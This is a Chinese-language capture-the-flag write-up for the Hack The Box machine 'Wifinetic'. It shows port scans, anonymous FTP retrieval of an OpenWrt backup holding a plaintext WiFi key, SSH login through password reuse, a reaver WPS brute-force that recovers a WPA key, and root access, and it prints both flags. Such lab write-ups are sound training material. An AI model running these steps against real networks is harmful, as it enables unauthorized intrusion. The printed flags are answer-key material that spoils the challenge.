HTB：Wifinetic[WriteUP]

目录

连接至HTB并启动靶机

1.What is the name of the OpenWRT backup file accessible over FTP?

使用nmap对靶机21、22端口进行脚本、服务信息扫描

2.Whats the WiFi password for SSID OpenWRT?

3.Which user reused the WiFi password on thier local account?

4.Submit the flag located in the netadmin user's home directory.

USER_FLAG：cc0491634861e5a3964c119ea9e35c79

5.What user space daemon software is being used to create access point and authentication servers?

6.Which interface is being used for monitoring?

7.What is the WPA password for the network on the mon0 interface?

8.Submit the flag located on the root folder.

ROOT_FLAG：1721e8c80650230ffc3ae02e11ed01f4

---

连接至HTB并启动靶机

靶机IP：10.10.11.247

分配IP：10.10.16.6

---

1.What is the name of the OpenWRT backup file accessible over FTP?

使用fscan对靶机进行端口扫描

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# fscan -nopoc -nobr -no -h 10.10.11.247

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
10.10.11.247:22 open
10.10.11.247:21 open
[*] alive ports len is: 2
start vulscan
已完成 2/2
[*] 扫描结束,耗时: 374.224745ms

由扫描结果可见，靶机开放21、22共2个端口

使用nmap对靶机21、22端口进行脚本、服务信息扫描

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p 21,22 -sCV 10.10.11.247            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-18 01:51 EDT
Nmap scan report for 10.10.11.247
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp          4434 Jul 31  2023 MigrateOpenWrt.txt
| -rw-r--r--    1 ftp      ftp       2501210 Jul 31  2023 ProjectGreatMigration.pdf
| -rw-r--r--    1 ftp      ftp         60857 Jul 31  2023 ProjectOpenWRT.pdf
| -rw-r--r--    1 ftp      ftp         40960 Sep 11  2023 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r--    1 ftp      ftp         52946 Jul 31  2023 employees_wellness.pdf
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.16.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds

使用Anonymous匿名身份登录靶机FTP服务器

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ftp 10.10.11.247                      
Connected to 10.10.11.247.
220 (vsFTPd 3.0.3)
Name (10.10.11.247:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||47610|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp          4434 Jul 31  2023 MigrateOpenWrt.txt
-rw-r--r--    1 ftp      ftp       2501210 Jul 31  2023 ProjectGreatMigration.pdf
-rw-r--r--    1 ftp      ftp         60857 Jul 31  2023 ProjectOpenWRT.pdf
-rw-r--r--    1 ftp      ftp         40960 Sep 11  2023 backup-OpenWrt-2023-07-26.tar
-rw-r--r--    1 ftp      ftp         52946 Jul 31  2023 employees_wellness.pdf
226 Directory send OK.

由回显可见，该目录下存在一个OpenWRT备份文件：backup-OpenWrt-2023-07-26.tar

---

2.Whats the WiFi password for SSID OpenWRT?

将backup-OpenWrt-2023-07-26.tar文件下载到本地

get backup-OpenWrt-2023-07-26.tar

ftp> get backup-OpenWrt-2023-07-26.tar
local: backup-OpenWrt-2023-07-26.tar remote: backup-OpenWrt-2023-07-26.tar
229 Entering Extended Passive Mode (|||46040|)
150 Opening BINARY mode data connection for backup-OpenWrt-2023-07-26.tar (40960 bytes).
100% |*************************************************************| 40960      162.37 KiB/s    00:00 ETA
226 Transfer complete.
40960 bytes received in 00:00 (61.77 KiB/s)

解压backup-OpenWrt-2023-07-26.tar文件

tar -xvf backup-OpenWrt-2023-07-26.tar

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# tar -xvf backup-OpenWrt-2023-07-26.tar
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
./etc/uhttpd.key
./etc/uhttpd.crt
./etc/sysctl.conf
./etc/inittab
./etc/group
./etc/opkg/
./etc/opkg/keys/
./etc/opkg/keys/4d017e6f1ed5d616
./etc/hosts
./etc/passwd
./etc/shinit
./etc/rc.local
./etc/dropbear/
./etc/dropbear/dropbear_ed25519_host_key
./etc/dropbear/dropbear_rsa_host_key
./etc/shells
./etc/profile
./etc/nftables.d/
./etc/nftables.d/10-custom-filter-chains.nft
./etc/nftables.d/README
./etc/luci-uploads/
./etc/luci-uploads/.placeholder

进入解压后目录中，找到etc/config/wireless文件并查看其内容

┌──(root㉿kali)-[/home/…/Desktop/temp/etc/config]
└─# cat wireless        

config wifi-device 'radio0'
        option type 'mac80211'
        option path 'virtual/mac80211_hwsim/hwsim0'
        option cell_density '0'
        option channel 'auto'
        option band '2g'
        option txpower '20'

config wifi-device 'radio1'
        option type 'mac80211'
        option path 'virtual/mac80211_hwsim/hwsim1'
        option channel '36'
        option band '5g'
        option htmode 'HE80'
        option cell_density '0'

config wifi-iface 'wifinet0'
        option device 'radio0'
        option mode 'ap'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'
        option wps_pushbutton '1'

config wifi-iface 'wifinet1'
        option device 'radio1'
        option mode 'sta'
        option network 'wwan'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'

获取SSID为OpenWRT的密码：VeRyUniUqWiFIPasswrd1!

---

3.Which user reused the WiFi password on thier local account?

查看etc/passwd文件内容

┌──(root㉿kali)-[/home/kali/Desktop/temp/etc]
└─# cat passwd  
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false

尝试使用上文拿到的WIFI密码，登录账户：netadmin

┌──(root㉿kali)-[/home/kali/Desktop/temp/etc]
└─# ssh netadmin@10.10.11.247          
The authenticity of host '10.10.11.247 (10.10.11.247)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:3: [hashed name]
    ~/.ssh/known_hosts:5: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.247' (ED25519) to the list of known hosts.
netadmin@10.10.11.247's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 18 Oct 2024 09:30:32 AM UTC

  System load:            0.0
  Usage of /:             65.7% of 4.76GB
  Memory usage:           7%
  Swap usage:             0%
  Processes:              228
  Users logged in:        0
  IPv4 address for eth0:  10.10.11.247
  IPv6 address for eth0:  dead:beef::250:56ff:feb9:e5b6
  IPv4 address for wlan0: 192.168.1.1
  IPv4 address for wlan1: 192.168.1.23

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Sep 12 12:46:00 2023 from 10.10.14.23
netadmin@wifinetic:~$

---

4.Submit the flag located in the netadmin user's home directory.

查找user_flag位置

find / -name 'user.txt' 2>/dev/null

查看user_flag内容

cat /home/netadmin/user.txt

netadmin@wifinetic:~$ whoami
netadmin
netadmin@wifinetic:~$ find / -name 'user.txt' 2>/dev/null
/home/netadmin/user.txt
netadmin@wifinetic:~$ cat /home/netadmin/user.txt
cc0491634861e5a3964c119ea9e35c79

USER_FLAG：cc0491634861e5a3964c119ea9e35c79

---

5.What user space daemon software is being used to create access point and authentication servers?

查看WIFI认证服务状态：hostapd

systemctl status hostapd.service

netadmin@wifinetic:~$ systemctl status hostapd.service
● hostapd.service - Advanced IEEE 802.11 AP and IEEE 802.1X/WPA/WPA2/EAP Authenticator
     Loaded: loaded (/lib/systemd/system/hostapd.service; enabled; vendor preset: enabled)
     Active: active (running) since Fri 2024-10-18 10:54:27 UTC; 5s ago
    Process: 27508 ExecStart=/usr/sbin/hostapd -B -P /run/hostapd.pid -B $DAEMON_OPTS ${DAEMON_CONF} (code=exited, status=0/SUCCESS)
   Main PID: 27525 (hostapd)
      Tasks: 1 (limit: 4595)
     Memory: 936.0K
     CGroup: /system.slice/hostapd.service
             └─27525 /usr/sbin/hostapd -B -P /run/hostapd.pid -B /etc/hostapd/hostapd.conf

---

6.Which interface is being used for monitoring?

查看无线网络设备信息

iw dev

netadmin@wifinetic:~$ iw dev
phy#2
        Interface mon0
                ifindex 7
                wdev 0x200000002
                addr 02:00:00:00:02:00
                type monitor
                txpower 20.00 dBm
        Interface wlan2
                ifindex 5
                wdev 0x200000001
                addr 02:00:00:00:02:00
                type managed
                txpower 20.00 dBm
phy#1
        Unnamed/non-netdev interface
                wdev 0x1000001e6
                addr 42:00:00:00:01:00
                type P2P-device
                txpower 20.00 dBm
        Interface wlan1
                ifindex 4
                wdev 0x100000001
                addr 02:00:00:00:01:00
                ssid OpenWrt
                type managed
                channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
                txpower 20.00 dBm
phy#0
        Interface wlan0
                ifindex 3
                wdev 0x1
                addr 02:00:00:00:00:00
                ssid OpenWrt
                type AP
                channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
                txpower 20.00 dBm

由设备输出信息可见，除去mon0接口其他是受监管模式，而wlan0为AP模式

这意味着我们可以尝试捕获mon0接口数据包对它进行WPA密码爆破

---

7.What is the WPA password for the network on the mon0 interface?

查看靶机安装的网络相关工具

getcap -r / 2>/dev/null

netadmin@wifinetic:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep

利用AP模式的wlan0接口爆破mon0接口的WPA密码

reaver -i mon0 -b 02:00:00:00:00:00

netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[!] Found packet with bad FCS, skipping...
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'

成功获取到WPA密码：WhatIsRealAnDWhAtIsNot51121!

---

8.Submit the flag located on the root folder.

尝试使用该WPA密码切换成root用户

netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin# whoami
root

查找root_flag位置

find / -name 'root.txt' 2>/dev/null

查看root_flag内容

/root/root.txt

root@wifinetic:/home/netadmin# find / -name 'root.txt' 2>/dev/null
/root/root.txt
root@wifinetic:/home/netadmin# cat /root/root.txt
1721e8c80650230ffc3ae02e11ed01f4

ROOT_FLAG：1721e8c80650230ffc3ae02e11ed01f4